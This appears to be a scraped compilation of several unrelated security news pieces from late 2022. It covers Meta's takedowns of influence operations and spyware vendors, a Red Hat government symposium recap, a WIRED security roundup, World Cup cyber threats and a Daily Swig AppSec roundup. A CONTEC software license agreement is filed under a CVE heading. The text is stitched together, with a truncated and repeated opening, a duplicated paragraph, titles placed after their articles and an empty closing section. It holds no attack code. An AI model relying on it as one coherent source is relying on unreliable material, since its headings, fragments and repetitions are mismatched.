Meta Platforms disclosed that it took down no less than 200 covert influence operations since 2017 spanning roughly 70 countries across 42 languages.
The social media conglomerate also took steps to disable accounts and block infrastructure operated by spyware vendors, including in China, Russia, Israel, the U.S. and India, that targeted individuals in about 200 countries.
"The global

Meta Platforms disclosed that it took down no less than 200 covert influence operations since 2017 spanning roughly 70 countries across 42 languages.

The social media conglomerate also took steps to disable accounts and block infrastructure operated by spyware vendors, including in China, Russia, Israel, the U.S. and India, that targeted individuals in about 200 countries.

"The global surveillance-for-hire industry continues to grow and indiscriminately target people – including journalists, activists, litigants, and political opposition – to collect intelligence, manipulate and compromise their devices and accounts across the internet," the company noted in a report published last week.

The networks that were found to engage in coordinated inauthentic behavior (CIB) originated from 68 countries. More than 100 nations are said to have been targeted by at least one such network, either foreign or domestic.

With 34 operations, the U.S. emerged as the most frequently targeted nation during the five-year period, followed by Ukraine (20) and the U.K. (16).

The top three geographic sources of CIB networks during the same timeframe were Russia (34), Iran (29), and Mexico (13). On top of that, an Iranian network disrupted by Meta in April 2020 focused on 18 countries at a time, indicating the scope of foreign interference in these campaigns.

"Notably, both our first takedown and our 200th takedown were of CIB networks originating from Russia," Meta's Ben Nimmo and David Agranovich said. "The latter takedown targeted Ukraine and other countries in Europe."

The activity, the details of which the company first disclosed in September 2022, has since been attributed as the work of two companies, Structura National Technologies and Social Design Agency (Агентство Социального Проектирования), located in the country.

That said, CIB networks run across the world have often been found targeting people in their own country, not to mention have a cross-platform presence that go beyond Facebook and Instagram to encompass Twitter, Telegram, TikTok, Blogspot, YouTube, Odnoklassniki, VKontakte, Change\[.\]org, Avaaz, and LiveJournal.

Meta further highlighted a "rapid rise" in the use of profile pictures created through artificial intelligence techniques like generative adversarial networks (GAN) since 2019 in a bid to pass off rogue accounts as more authentic and evade detection.

****Tackling Platform Abuse by Spyware Entities****

In a related report on surveillance-for-hire operations, the Menlo Park-based company said it removed a network of 130 accounts created by an Israeli company named Candiru that used these fake accounts to test phishing capabilities by sending malicious links designed to deploy malware.

A second set of 250 accounts on Facebook and Instagram linked to another Israeli company called QuaDream was found "engaged in a similar testing activity between their own fake accounts, targeting Android and iOS devices in what we assess to be an attempt to test capabilities to exfiltrate various types of data including messages, images, video and audio files, and geolocation."

Both Candiru and QuaDream are founded by former employees of NSO Group, a controversial cyber intelligence firm that has come under fire for selling its invasive technology, Pegasus, to governments with poor human rights records.

What's more, Meta said it removed more than 5,000 accounts belonging to companies such as Social Links, Cyber Globes, Avalanche, and an unattributed entity in China that used the fraudulent accounts to scrape publicly available information and market "web intelligence services."

Nearly 3,700 of those Facebook and Instagram accounts were linked to Social Links, with the China-based network of 900 accounts targeting military personnel, activists, government employees, politicians, and journalists in Myanmar, India, Taiwan, the U.S., and China.

Besides relying on fake accounts, spyware vendors have also been caught relying on other legitimate tools to conceal their origin and conduct malicious activities. One such example is the Indian hack-for-hire firm CyberRoot, which utilized a marketing solution known as Branch to create, manage, and track phishing links.

Nearly 3,700 of those Facebook and Instagram accounts were attributed to Social Links, with the China-based network of 900 accounts targeting military personnel, activists, government employees, politicians, and journalists in Myanmar, India, Taiwan, the U.S., and China.

CyberRoot has also been estimated to operate over 40 fictitious accounts that impersonated journalists, business executives, and media personalities to gain the trust of targets and send phishing links spoofing services like Gmail, Zoom, Facebook, Dropbox, Yahoo, OneDrive, and Outlook to steal their credentials.

Law firms, cosmetic surgery clinics, real estate companies, investment and private equity firms, pharmaceuticals, media houses, activist groups, and gambling entities are believed to have been targeted by the mercenary actor.

CyberRoot is the second Indian surveillance-for-hire firm to come under the radar after BellTroX, whose accounts were flagged and disbanded by the company in 2021. Coincidentally, it's also said to have been assisted by BellTroX in the past.

"These companies are part of a sprawling industry that provides intrusive software tools and surveillance services indiscriminately to any customer — regardless of who they target or the human rights abuses they might enable," Meta said.

"In a sense, this industry 'democratizes' these threats, making them available to government and non-government groups that otherwise wouldn't have these capabilities to cause harm."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Facebook Cracks Down on Spyware Vendors from U.S., China, Russia, Israel, and India

CONPROSYS HMI System (CHS) Ver.3.4.4?and earlier allows a remote unauthenticated attacker to execute an arbitrary OS command on the server where the product is running by sending a specially crafted request.

PLEASE READ THIS SOFTWARE LICENSE AGREEMENT (the "Agreement") CAREFULLY BEFORE USING CONTEC'S SOFTWARE. THIS AGREEMENT SET FORTH TERMS AND CONDITIONS REGARDING THE LICENSE TO USE CONTEC'S SOFTWARE ONTO WHICH THE AGREEMENT IS ATTACHED (the "Software"). BY DOWNLOADING, INSTALLING OR USING THE SOFTWARE OR USING MACHINEARY ONTO WHICH THE SOFTWARE HAS BEEN INSTALLED, CUSTOMERS ARE AGREEING TO BE BOUND BY THE AGREEMENT. CUSTOMERS MAY NOT DOWNLOAD, INSTALL OR USE THE SOFTWARE OR ANY MACHINERY ONTO WHICH THE SOFTWARE HAS BEEN INSTALLED WITHOUT AGREEING TO THE AGREEMENT.

Article 1. Intellectual Property Rights  
The copyright, patent right or any other intellectual property right pertaining to the Software or any documentary attachments, such as manuals, as well as any copies thereof (the "Software and the Like") shall belong to CONTEC or to a third party who has the right pertaining to the Software and the Like and who has granted CONTEC the right to use them, and customers shall have no rights therefor other than those expressly authorized herein.

Article 2. Permitted License  
1\. CONTEC grants customers a non-exclusive right to install and use the Software on one (1) computer during the term of the license which the customer has purchased.  
2\. Customers may make one (1) copy of the Software solely for emergency backup purposes in using the Software.

Article 3. License Authentication  
Customers need to follow license authentication procedures to use the Software. If a customer does not properly follow license authentication procedures, the customer's use of the Software may be restricted.

Article 4. Restrictions on Use  
Customers shall not:  
(1) Create any derivative software from the Software;  
(2) Copy the Software other than as set forth herein;  
(3) Modify, adapt, decompile, disassemble or reverse-engineer the Software;or  
(4) Delete or alter the indication of the rights or the trademark on the Software.

Article 5. Limited Liabilities  
1\. If a customer gives a written notice of material non-conformity of the Software (except for malfunctions arising out of particular hardware or software which is not guaranteed to operate with the Software) within 90 days from the date of purchase of the license of the Software, CONTEC shall provide a modification program, introduce a solution, or return a part of the payment, depending on the degree of the non-conformity, and based on CONTEC's sole discretion.  
2\. EXCEPT AS OTHERWISE PROVIDED BY THE PRECEDING PARAGRAPH, CONTEC HEREBY DISCLAIMS ANY WARRANTY WITH RESPECT TO THE SOFTWARE, EITHER EXPRESS, IMPLIED OR STATUTORY, INCLUDING BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY, OF SATISFACTORY QUALITY, OR FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS HAVE SOLE RESPONSIBILITIES FOR CHOOSING THE SOFTWARE.  
3\. TO THE EXTENT NOT PROHIBITED BY LAW, IN NO EVENT SHALL CONTEC BE LIABLE FOR PERSONAL INJURY, OR ANY INCIDENTAL, SPECIAL, INDIRECT OR ANY OTHER COMMERCIAL DAMAGES OR LOSSES, ARISING OUT OF OR RELATED TO YOUR USE OR INABILITY TO USE THE SOFTWARE AND THE LIKE.

Article 6. Transfer  
1\. Customers may transfer the Software and the Like and their authorized rights herein to a third party provided that the transferee agrees to the terms and conditions herein. The customer transferring the rights shall not use the Software and the Like after such transfer.  
2\. Notwithstanding the preceding paragraph, if Customers obtained the rights pertaining to the Software and the Like by purchasing CONTEC's hardware, customers may transfer their authorized rights pertaining to the Software and the Like only when the customer satisfies all of the following conditions:  
(1) The customer transferring the rights transfers the transferee all the hardware on which the Software has been installed;  
(2) The customer transferring the rights shall not use the Software and the Like after the transfer; and  
(3) The transferee agrees to the terms and conditions herein.  
3\. If the Software and the Like and the authorized rights herein are transferred pursuant to the preceding paragraphs, the transferee shall be bound by the Agreement upon the transfer.

Article 7. Expiration and Termination  
1\. This Agreement shall expire upon the expiration of the term of the license.  
2\. CONTEC may terminate the Agreement with immediate effect without any notice or demand to the customer if the customer fails to comply with any of the provisions herein.  
3\. Upon the termination of the Agreement, the customer's license shall cease to be effective. The customer shall immediately discontinue using the Software in any way, and shall uninstall and destruct any reproduction of the Software.

Article 8. Version Update  
1\. CONTEC may update the version of the Software without prior notice to customers.  
2\. CONTEC may offer a new version of the Software to customers with or without charge.

Article 9. Term of Support Service  
Support service for the Software will not be provided upon the expiration of the term of the license which the customer has purchased. Regardless of the term of the license, support service can be terminated when the support term for the operating system on which the Software can operate and for the software platform end.

Article 10. Export Control  
1\. Customers shall comply with the Foreign Exchange and Foreign Trade Act of Japan, the U.S. Export Administration Regulation and the laws and regulations of any other country when taking the Software and the Like outside Japan.  
2\. Customers shall not transfer, export or re-export the Software and the Like to any individual or entity that is likely to use the Software and the Like to design, develop or manufacture nuclear weapons, biochemical weapons, or to design, develop or manufacture missiles.  
3\. Customers shall not transfer, export or re-export the Software and the Like to any individuals or entities set forth in the following countries or regions:  
(1) The Republic of Cuba, The Islamic Republic of Iran, the Republic of Iraq, the Great Socialist People's Libyan Arab Jamahiriya or North Korea;  
(2) Any individuals or entities on the "List of Foreign Users" based on the Import Trade Control Order or the U.S. Department of Commerce's "Denied Person's List or Entity List"; or  
(3) Any country, region, individual or entity designated by the government of Japan, the U.S. or any other relevant country.

Article 11. Governing Law  
The provisions herein shall be construed and governed in accordance with the laws of Japan. This Agreement shall not be governed by the United Nations Convention on Contracts for the International Sale of Goods, the application of which is expressly excluded.

Article 12. Dispute Resolution  
Upon the occurrence of any dispute in relation to the Agreement or the Software, if any legal procedures are required, such as the filing of a petition for a lawsuit, the Osaka Summary Court or the Osaka District Court shall have the exclusive jurisdiction over such dispute.

Article 13. Severability  
If for any reason any portion of the provisions set forth herein is found to be invalid or unenforceable, the remainder of the Agreement shall not be affected in any way and shall be valid and enforceable to the extent permitted by law.

CVE-2022-44456: Download License Agreement | CONTEC

<p>Across government, organizations have extended operations from the datacenter to multiple public clouds to the edge. Now they need to manage data and deliver intelligent capabilities across those environments. More than ever, they must achieve those goals with greater simplicity, consistency and availability, along with enhanced security of their IT operations.</p>

<p>These imperatives were the focus of <a href="https://www.redhat-govsymposium.com/program/">Red Hat Government Symposium 2022</a>, which

Across government, organizations have extended operations from the datacenter to multiple public clouds to the edge. Now they need to manage data and deliver intelligent capabilities across those environments. More than ever, they must achieve those goals with greater simplicity, consistency and availability, along with enhanced security of their IT operations.

These imperatives were the focus of Red Hat Government Symposium 2022, which convened on November 9 at the Waldorf Astoria in Washington, D.C. With an overarching theme of “Innovation Unleashed,” the one-day event packed in eight insightful keynotes and panels delivered by nearly 20 industry and government leaders, plus a half-dozen drill-down breakout sessions. As the day unfolded, the following themes emerged: 

**Deploying and scaling at the mission edge**

The modern battlespace involves satellites, drones and sensors that send and receive data at the extreme edge. Symposium attendees heard from Winston Beauchamp, deputy CIO of the Air Force, and Michelle Davis, director of DoD Solution Architects for Red Hat, about ways the military is using edge compute and data management to accelerate critical decisions and dominate the battlespace.

We also learned about deployment-ready edge technology from Mark Valcich, civilian general manager of Public Sector for Intel, and Dylan Conner, vice president and product manager for Archon. They described standards-based technology that’s enabling rapid edge implementations with stronger security capabilities today.

**Achieving automation and insights**

Machine learning (ML) and other forms of artificial intelligence (AI) are showing up in more places. Justin Taylor, vice president of AI for Lockheed Martin, and Chris Edillon, solution architect for Red Hat, described how intelligent technologies are transforming the capabilities of drones.

Conference-goers learned about other advanced analytics capabilities in a panel discussion by Jesus Caban, chief of Clinical Research Informatics at Walter Reed Medical Center, and Amanda Purnell, director of Data and Analytics Innovation for the Department of Veterans Affairs. These government leaders provided first hand stories of how AI and ML are helping agencies solve real-world, critical challenges.

**Building cyber-resilience**

Cybersecurity is now central to innovation. A multilayered defense can help stack the cyber-risk deck in your agency’s favor, noted panelists Ken Bailey, section chief of threat hunting for CISA; Jon Boyens, deputy chief of computer security for NIST; and Sandra López, CTO for Leidos. They shared insight into how organizations can build resilience into their networks and minimize downtime in the face of a breach.

**Quantifying quantum computing**

Finally, Vishnu Parasuraman, lead of the federal HCT OpenShift offering at IBM, and Michael Epley, chief architect, Public Sector, at Red Hat, explored the vast potential of quantum computing. Combining the results of quantum algorithms with classical computers can unleash a wealth of real-time data to support government missions. These innovations are moving within reach.

But those were only the highlights of Red Hat’s 13th-annual Government Symposium. Attendees also benefited from breakout sessions on real-time edge intelligence, enterprise integration, the future of government service delivery and more. They also heard real-world insights from agency leaders at the Coast Guard, FEMA and USPS, and from technology leaders at Accenture, AWS and KPMG.

Organizations can unleash innovation if they deploy the most effective technologies in the most effective ways. The Red Hat Government Symposium 2022 showed how agencies and their industry partners are doing just that. Couldn't make it to DC for Red Hat Government Symposium in-person? Join us online for the Best of Symposium keynotes and breakout sessions for free on demand.

Red Hat Government Symposium 2022: Unleashing innovation, powering missions

Plus: An FBI platform got hacked, an ex-Twitter employee is sentenced for espionage, malicious Windows 10 installers circulate in Ukraine, and more.

As Russia's invasion of Ukraine drags on, navigation system monitors reported this week that they've detected a rise in GPS disruptions in Russian cities, ever since Ukraine began mounting long-range drone attacks. Elsewhere, a lawsuit against Meta alleges that a lack of adequate hate-speech moderation on Facebook led to violence that exacerbated Ethiopia's civil war. 

New evidence suggests that attackers planted data to frame an Indian priest who died in police custody—and that the hackers may have collaborated with law enforcement as he was investigated. The Russia-based ransomware gang Cuba abused legitimate Microsoft certificates to sign some of their malware, a method of falsely legitimatizing hacking tools that cybercriminals have particularly been relying on lately. And with the one-year anniversary of the Log4Shell vulnerability, researchers and security professionals reflected on the current state of open source supply-chain security, and what must be done to improve patch adoption.

We also explored the confluence of factors and circumstances leading to radicalization and extremism in the United States. And Meta gave WIRED some insight into the difficulty of enabling users to recover their accounts when they get locked out—without allowing attackers to exploit those same mechanisms for account takeovers.

But wait, there’s more! Each week, we highlight the security news we didn’t cover in depth ourselves. Click on the headlines below to read the full stories.

Alexey Brayman, 35, was one of seven people named in a 16-count federal indictment this week in which they were accused of operating an international smuggling ring over the past five years, illegally exported restricted technology to Russia. Brayman was taken into custody on Tuesday and later released on a $150,000 bond, after being ordered to forfeit his passport and abide by a curfew. He is an Israeli citizen who was born in Ukraine. Brayman and his wife, Daria, live in Merrimack, New Hampshire, a small town where the two ran an online craft business out of their home. “They are the nicest family,” a delivery driver who regularly drops off packages at their home told _The Boston Globe_. “They’ll leave gift cards out around the holidays. And snacks.” The indictment alleges, though, that their house was a staging site for “millions of dollars in military and sensitive dual-use technologies from US manufacturers and vendors.” Two other suspects connected to the case have also been arrested in New Jersey and Estonia.

A hacker breached the FBI information-sharing database InfraGard this week, compromising data from more than 80,000 members who share details and updates through the platform related to critical infrastructure in the United States. Some of the data is sensitive and pertains to national and digital security threats. Last weekend, the hacker posted samples of data stolen from the platform on a relatively new cybercriminal forum called Breached. They priced the database at $50,000 for the full contents. The hacker claims to have gained access to InfraGard by posing as the CEO of a finance company. The FBI said it was “aware of a potential false account associated with the InfraGard Portal and that it is actively looking into the matter.”

Former Twitter employee Ahmad Abouammo was convicted in August of being paid to send user data to the Saudi Arabian government while working at the tech company. He was also found guilty of money laundering, wire fraud, and falsification of records. He has now been sentenced to 42 months in prison. Abouammo worked at Twitter from 2013 to 2015. “This case revealed that foreign governments will bribe insiders to obtain the user information that is collected and stored by our Silicon Valley social-media companies,” US attorney Stephanie Hinds said in a statement. “This sentence sends a message to insiders with access to user information to safeguard it, particularly from repressive regimes, or risk significant time in prison.” Earlier this year, whistleblower and former Twitter security chief Peiter Zatko alleged that Twitter has long had problems with foreign agents infiltrating the company. The situation has been of particular concern as new CEO Elon Musk massively overhauls the company and its workforce.

In an effort to compromise Ukrainian government networks,  hackers have been posting malicious Windows 10 installers on torrent sites used in Ukraine and Russia, according to researchers from the security firm Mandiant. The installers were set up with the Ukrainian language pack and were free to download. They deployed malware for reconnaissance, data gathering, and exfiltration. Mandiant said it could not definitively attribute the campaign to specific hackers, but that the targets overlap with those that have been attacked in past hacks by the Russian military intelligence agency GRU.

Years after it was proved vulnerable and insecure, the US National Institute of Standards and Technology said on Thursday that the SHA-1 cryptographic algorithm should be removed from all software platforms by December 31, 2030. Developers should turn instead to algorithms with more robust security, namely SHA-2 and SHA-3. The “security hash algorithm,” or SHA, was developed by the National Security Agency and debuted in 1993. SHA-1 is a slightly modified replacement used since 1995. By 2005 it was clear that SHA-1 was “cryptographically broken,” but it remained in widespread use for years. NIST said this week, though, that attacks on SHA-1 “have become increasingly severe.” Developers have eight years to migrate away for any remaining uses of the algorithm. "Modules that still use SHA-1 after 2030 will not be permitted for purchase by the federal government,” NIST computer scientist Chris Celi said in a statement.

An Alleged Russian Smuggling Ring Was Uncovered in New Hampshire

The 2022 FIFA Men's World Cup final in Qatar will be the most-watched sporting event in history — but will cybercriminals score a hat trick off its state-of-the-art digital footprint?

As Argentina and France prepare to face off in Doha for the final of the 2022 FIFA Men's World Cup, stadium staff and tournament organizers likely have more on their minds than whether Lionel Messi or Kylian Mbappe will claim the title of top goal-scorer. The event represents a vast cyberattack surface for both FIFA and the host nation of Qatar, security experts say — and ahead of the tournament's grand finale, cyber threats from all corners remain very clear and present.

According to FIFA, 2022 will end up being the most-watched tournament in history, followed by literally billions around the globe. On-the-ground numbers are impressive, too: Stadium Lusail, where the final will be played, is the biggest stadium in Qatar and has a capacity of the 88,966 spectators. Ticket sales for the World Cup have topped 3 million for an unprecedented 1.2 million visitors, which is equivalent to nearly half of Qatar's population.

That's a juicy target for not only financially motivated threat actors and hacktivists but also nation-state groups, who more often than not can get the ball in the back of the intelligence-gathering net when they want to.

**Smart Stadiums & the Digital Pitch**

The risks come from a few different places: social engineering efforts against fans and visitors being the most well known. What's less well known is the fact that Qatar has leaned in hard to the smart stadium concept, connecting its eight World Cup venues into one connected digital space.

A partnership between Johnson Controls' OpenBlue digital platform and Microsoft Azure, for instance, has enabled an artificial intelligence-based approach to physical security and operations, gathering data from edge devices and systems to identify when a security or safety issue has the potential to affect fans and players, or how crowd size and weather changes might affect energy efficiency and playing conditions.

Each stadium also has a 3D digital twin, an interactive digital model that provides live information on safety, comfort, and sustainability to a team of command center experts.

"With major sporting events becoming increasingly digitized, the attack surface for threat actors has also increased," a recent ZeroFox report on World Cup threats noted. "Qatar has constructed eight state-of-the-art 'smart stadiums' specifically for the World Cup, meaning sophisticated threat actors will almost certainly aim to compromise networks by exploiting vulnerabilities within interconnected stadium systems, including operational technology and Internet of Things (IoT) devices."

This raises the possibility of denial-of-service attacks or disruption on the order of the Olympic Destroyer threat, which took aim (largely unsuccessfully) at the Winter Games in Pyeongchang in 2018.

While it's not known what specific cyber defenses this first-of-its-kind footprint has in place, Qatar brought in a team of cybersecurity experts for a summit in March, and it has been working closely with Interpol's Project Stadia to enhance its security posture. So far, so good — but it's not over yet.

**Mobile Privacy Concerns**

Also, notably, there is a pair of mobile apps that everyone 18 and above entering Qatar for the World Cup is required to download, named Ehteraz and Hayya. Ehteraz is a COVID-19 tracking app, while Hayya is an app used for World Cup game tickets and accessing the Qatar metro system to move between stadiums.

At issue is the fact that Ehteraz has an extensive list of required permissions so that it can monitor locations and proximity to other app users; it can capture data from the device, automatically exfiltrate data from a user's phone, disable a lock screen, make calls from the phone, and access location services.

The Hayya app, meanwhile, is able to "access almost all personal information on a phone," according to ZeroFox, and can tap into location services and network connections between a phone and other networks.

Both apps potentially offer riches to cybercriminals. "When threat actors look to exploit an app, the end goal is to steal information that would be profitable — login credentials, personally identifiable information, email, credit cards, etc. — so that they can either sell it to actors who know how to further exploit or use the credentials and check to see if they can steal money or crypto from the victim accounts," says Adam Darrah, senior director of Dark Ops Collections at ZeroFox.

However, more shadowy risks also apply; the apps, with their broad set of access to personal data, are a perfect vector for espionage and creating fan chaos.

"When a nation-state or a motivated hacktivist group has you in their sights, they will find a way in," Darrah says. "All nations view an event such as the World Cup as a way to gather intelligence."

Regarding the COVID-19 contact tracing app for instance, the ZeroFox report noted, "Critics fear downloading the app could give the Qatari government access to privileged or sensitive content on a user’s phone. This is particularly notable if the user is breaking a Qatari law. It could also give Qatari authorities access to proprietary information contained on a company phone."

The firm recommended not installing the app on any phone with access to sensitive information, as a precaution.

**Facial Recognition at the World Cup**

Another wrinkle in the threat landscape for the World Cup is the vast facial-recognition footprint that Qatar has stood up in order to help respond to any threats of bodily harm to visitors and staff. Tensions famously run high at football (aka soccer) matches, but beyond run-of-the-mill hooliganism, some tourney-watchers are concerned that there could be a serious physical security incident.

To help thwart such a situation, the country has installed more than 15,000 cameras with facial recognition technology stationed throughout the eight stadiums and along roads and transportation infrastructure in Doha.

The benefits to physical security are myriad, of course. "Say a fan places a suspicious package close to a stadium entrance. When security personnel are alerted to this threat, staff can retroactively use facial recognition to trace the suspect's steps, determine where they are going next, and possibly pick them out in a crowd if needed," Terry Schulenberg, vice president of business development at CyberLink, tells Dark Reading. "The technology can even alert staff when a bad actor enters their area. Facial recognition will provide staff with the information they need."

However, critics have raised privacy concerns, a well-worn issue when it comes to facial recognition. After all, the population can't "opt in" to being scanned; the potential for surveillance by the Qatari government or advanced persistent threats (APTs) is there; and, it's unclear how the system handles the biometric data it collects.

"It would benefit them not to store faces in the cameras, workstations, or servers," Schulenberg says. "Rather, they could use software that identifies hundreds of vectors on a subject's face — such as the distance between the eyebrows — convert them into an encrypted file, send this file to a workstation or server, and compare its values with those of previously recorded subjects or those enrolled in a database. If it's being used, this more airtight facial recognition model will help security operators process camera feed data more quickly and securely."

If Qatar is not storing full images of attendees' faces, any unlikely leak of facial recognition data would be unreadable without access to the specific software Qatar is using, he stresses. 

**Thwarting Social Engineering Threats**

And finally, utterly predictably, phishers and scammers have been drawn to the event, using World Cup-themed lures, malicious mobile apps, and bogus ticketing websites to harvest data and steal funds from unsuspecting fans. In fact, Kaspersky said this week that its researchers have seen fake tickets being sold for as much as $4,000 a pop.

Group-IB's Digital Risk Protection team recently said it has detected more than 16,000 scam domains, and dozens of fake social media accounts, advertisements, and mobile applications created by scammers aiming to capitalize on the world's largest sporting event. The researchers also uncovered more than 90 potentially compromised accounts on official FIFA World Cup 2022 fan portals.

Patrick Harr, CEO at SlashNext, notes that FIFA and any World Cup host nation can take action to protect aficionados of the beautiful game from social engineering.

"FIFA could ensure its security program includes brand impersonation identification, remediation, and a takedown service," he says. "With this type of security control, FIFA could safeguard their millions of fans, so they don’t accidentally engage with malicious content while following the news on their favorite teams."

Eyal Benishti, founder and CEO at Ironscales, notes that FIFA also should be focusing on raising awareness, sounding a loud drumbeat to fans.

"They should be told to avoid clicking on links behind QR codes, stay away from SMS messages asking to validate or verify, and to go directly to the official FIFA domain only, to interact and purchase tickets," he says. "Send out clear communication to the future guests on the guidelines, what to expect and what to be on the lookout for."

He also pointed out that World Cup employees have also been targeted throughout the tournament, bringing up another layer of responsibility for organizers.

"For the FIFA organization and businesses of Qatar, focus on what you can control, like making sure your internal employees are educated and aware of the probability of fake emails and fake support requests that will spike," he says. "If they receive requests that seem out of place, always validate with the sender via phone or alternate communicate method. Be extra cautious and ensure the proper communication and education are taking place for your employees."

**Cybersecurity Lessons to Be Learned**

Qatar's World Cup hosting duties may be coming to a close, and hopefully without a major cyberattack marring the experience, but there are lessons to be learned when it comes to implementing good security for such a sprawling endeavor. 

Whether it's an attack on infrastructure, privacy concerns, or the phishing glut that has surrounded the tournament, the time is now to be thinking about risk mitigation for future events, like the upcoming 2023 FIFA Women's World Cup next summer.

Researchers say that it's especially crucial to conduct an assessment once all is said and done, ideally using threat intelligence and data from this winter's event — given that it's likely that many of the pioneering technologies that Qatar put in place for the tourney will be tapped for future tournaments. For instance, stadiums across the US, which is a co-host of the 2026 FIFA Men's World Cup, are already using facial recognition tools for staff and fan entry, ticket verification, and contactless payments.

"An event the size and scale of a World Cup represents rich pickings for the criminally inclined, with millions of visitors seen as millions of potential victims," Rob Fitzsimons, field application engineer at Telesoft Technologies, said in a recent column. "It is the responsibility of the host nation to ensure the safety and security of its guests — both physically and digitally."

He added, "Indeed, a continuous flow of real-time threat intelligence in advance of and throughout the tournament \[provides\] a greater understanding of the potential threats, and enables security professionals to better defend against them. Recognizing where vulnerabilities lie, and addressing these accordingly, will allow better protection of mobile networks, and help protect against targeted attacks … and, by monitoring and controlling the flow of information across these networks, it's possible to reduce the likelihood of more widescale attacks."

Cyber Threats Loom as 5B People Prepare to Watch World Cup Final

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Dec. 9 and Dec. 16. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Round up for December 9 to December 16

Your fortnightly rundown of AppSec vulnerabilities, new hacking techniques, and other cybersecurity news

John Leyden 16 December 2022 at 17:43 UTC

Your fortnightly rundown of AppSec vulnerabilities, new hacking techniques, and other cybersecurity news

Our second web security roundup begins with news that a brace of network security flaws in products from Fortinet and Citrix have each come under active attack.

These attacks were respectively enabled by memory corruption vulnerabilities in the FortiOS SSL-VPN as well as a critical arbitrary code execution risk in Citrix ADC and Citrix Gateway (CVE-2022-27518). It’s unclear whether these assaults are linked, but their occurrence can still be said to underline the importance of patching SSL VPN devices, which have previously been vectors for pushing ransomware onto enterprise networks, among other attacks.

Uber this week suffered a data breach as a result of a cybersecurity incident at a third-party vendor, resulting in the exposure of employees’ personal information. The incident represents only the latest security breach to impact the ride-hailing app firm, which was previously faulted for the delayed disclosure of a 2016 breach that exposed the account records of customers and drivers. More recently, back in September, Uber’s internal IT systems were breached by a social engineering attack.

Over at Black Hat Europe, security researcher Nitesh Dhanjani discussed the impact of floor prices of non-fungible token (NFT) collections and how attacks focused on business dynamics have the potential to wreak havoc on marketplaces. Dhanjani also spoke about off-chain and on-chain sync algorithms, and how the disparities between the two blockchain-related environments can be abused.

I also attended the event for The Daily Swig, reporting on a keynote in which security researcher Daniel Cuthbert said the industry’s fixation on zero-day vulnerabilities was only a partial solution to making the internet fundamentally secure. We also covered some of the top hacking tools from the event.

Among other stories on The Daily Swig in recent days was an Akamai WAF bypass via Spring Boot, SQL injection payloads being smuggled past WAFs, and a crypto maintainer rejecting a bogus cryptocurrency ‘vulnerability’ submitted with the help of ChatGPT.

Here are some other web security stories and other cybersecurity news that caught our attention in the last fortnight:

**Web vulnerabilities**

*   Apache CXF / Critical / SSRF (server-side request forgery) vulnerability in parsing the href attribute of XOP / Disclosed with patch, December 13
*   Grails Spring Security Core plugin / CVE-2022-41923 / Critical / “Vulnerability allows an attacker access to one endpoint (i.e. the targeted endpoint) using the authorization requirements of a different endpoint” / Disclosed with patch, November 22
*   Microsoft .NET / CVE-2022-41089 / Critical / “Malicious actor could cause a user to run arbitrary code as a result of parsing maliciously crafted xps files” / Disclosed with a patch, December 13
*   Ping / CVE-2022-23093 / Memory-handling vulnerability involving networking protocol implementation by FreeBSD prompted its developers to test their own software, which unearthed a flaw in OpenBSD’s implementation of Ping that dates back to software changes introduced 24 years ago
*   Planet eStream / Critical / Vulnerabilities in video platform geared towards online learning enable attackers to take over user accounts with administrative privileges and execute arbitrary JavaScript code, among other attacks / Vendor has released software updates

**Research and attack techniques**

*   A researcher documented how it’s possible to exploit misconfigurations in cross-origin resource sharing (CORS) – a mechanism to control access to restricted website resources from external domains – to run various attacks. CORS misconfiguration issues have historically been downplayed but can seemingly be exploited to bypass CSRF protections or run cross-site tracking (XST) attacks.
*   Lightspin uncovered a serious flaw in an AWS-hosted service that allows software developers to find and share public container images. Attackers could potentially delete all images in the AWS Elastic Container Registry (ECR) Public Gallery or update image contents to inject malicious code, prompting AWS to resolve the problem within a day of its disclosure.
*   A series of flaws in three popular applications that allows an Android device to be used as a remote keyboard and mouse were exposed by Synopsys Cybersecurity Research Center (CyRC) The authentication, authorization, and insecure communication flaws potentially opened up attacks including keystroke sniffing.
*   Supposedly ‘air-gapped’ networks without direct access to the internet often require DNS services in order to resolve a company’s internal DNS records – a weakness potential hackers might be able to exploit, as a blog post by Pentera explains.
*   SALT Labs used a LEGO\-run site as a testbed to illustrate the general risk posed by API security issues. Researchers uncovered a variety of API-related security issues in LEGO’s Brick Lane, including a potential vector to internal production data and systems or manipulating users into surrendering control of their accounts.

LEGO reportedly fixed a number of API security issues found by SALT Labs

**Bug bounty / vulnerability disclosure**

*   HackerOne revealed that cloud-based vulnerabilities account for a growing proportion of vulnerabilities reported by bug bounty hunters, now totalling 65,000 in 2022, a year-on-year rise of 21%.
*   A security researcher who discovered a means to achieve unauthorized access to resumes stored on LinkedIn may have been left underwhelmed by the $5,000 bounty he received for his find, given the potential impact of the issue on users of the Microsoft-owned business-focused social network. An Insecure Direct Object Reference (IDOR) security vulnerability, inadvertently introduced in October 2022, could have allowed recruiters and perhaps more unsavoury parties to download resumes without permission.
*   Swedish video surveillance giant Axis Communications has launched a private bug bounty program with Bugcrowd.

**New open source infosec/hacking tools**

*   Node Security Shield – a defensive tool that takes an allow-listing approach to protecting zero-day protection for NodeJS applications. The tool was inspired by the infamous Log4Shell vulnerability, a zero-day vulnerability in Log4j, a popular Java logging framework.
*   Invoke-DNSteal – allows pen testers to perform file transfers using the DNS protocol as a covert communications channel.
*   Kubeshark – API Traffic Viewer for Kubernetes, providing “deep visibility and monitoring of all API traffic and payloads going in, out and across containers and pods inside a Kubernetes cluster”

**For devs**

*   Google has announced a free-of-charge scanner that allows open source developers to check their software projects for vulnerable dependencies. The tool – called OSV-Scanner – builds on Google’s work in developing an open source vulnerability database.
*   OWASP, best known for its ‘Top 10 Web Application Security Risks’ framework, is backing the creation of a similar scheme to index classes of security risks in the world of AppSec and DevSecOps. The Top 10 CI/CD Security Risks taxonomy aims to catalogue risks in the CI/CD pipeline. “Insufficient Flow Control Mechanisms” topped the nascent list.
*   The SHA-1 cryptographic algorithm, in use since 1995, has reached the end of its useful life, announced the National Institute of Standards and Technology (NIST), which says the federal government should phase out its use by 2030.
*   Research from Endor Labs found that the vast majority (95%) of all vulnerabilities are “found in transitive dependencies – open source code packages that are not selected by developers, but indirectly pulled into projects”.

**For fun**

